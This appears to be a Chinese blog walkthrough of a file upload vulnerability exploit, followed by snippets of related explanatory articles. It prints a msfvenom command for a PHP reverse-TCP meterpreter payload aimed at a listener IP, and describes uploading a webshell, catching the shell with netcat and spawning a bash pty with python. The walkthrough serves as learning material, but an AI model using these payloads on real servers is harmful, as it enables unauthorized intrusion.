檔案上傳漏洞利用

2021-10-23 09:35:01 字數 1129 閱讀 9125

找到一處上傳點,上傳shell,利用msfvenom生成。

msfvenom -p php/meterpreter/revese_tcp lhost=192.168.3.171 lport=4444  -f raw > shell.php
本來上傳後,利用msfconle監聽的,但是沒有成功。所以up用了kali自帶的shell.

我們要使用simlpe-backdoor.php指令碼的shell,將其複製改名為shell.php到桌面,開啟php檔案修改ip引數。

然後用瑞士軍刀監聽,訪問shell上傳的路徑,這裡shell儲存在目標伺服器的位置很難發現,up用acunetix掃瞄出來的,訪問shell.php使其目標彈回shell.

提權

其中

python 一句話獲取標準shell

python -c 「import pty;pty.spawn(』/bin/bash』)」

這裡只是提權到www-data並不是最高許可權,後續許可權等明天再寫吧!天道酬

檔案上傳漏洞

php語言 form表單 tmp臨時目錄 file 判斷檔案資訊 臨時檔案放入想要放的位置 移動臨時檔案 1.伺服器配置不當 2.開源編輯器上傳漏洞 3.本地檔案上傳限制被繞過 4.過濾不嚴或被繞過 5.檔案解析漏洞導致檔案執行 6.檔案上傳路徑 1.前段解析指令碼語言 2.允許上傳指令碼檔案 3....

檔案上傳漏洞

什麼是檔案上傳 一些web應用程式中允許上傳,文字或者其他資源到指定的位置,檔案上傳漏洞就是利用這些可以上傳的地方將惡意 植入到伺服器中,再通過url去訪問以執行 webshell 以web 方式進行通訊的命令直譯器,也叫 後門。本質上講,webshell 就是乙個能夠執行指令碼命令的檔案,其形式可...

檔案上傳漏洞

檔案上傳漏洞的概述 上傳漏洞的危害 檔案上傳漏洞的利用 檔案上傳漏洞的防禦 1 背景 什麼是檔案上傳 為什麼會有檔案上傳 在 運營過程中,不可避免地要對 的某些頁面或者內容進行更新,這個時候需要使用到 的檔案上傳功能。如果不對被上傳的檔案進行限制或者限制被繞過,該功能便有可能會被利用上傳可執行檔案 ...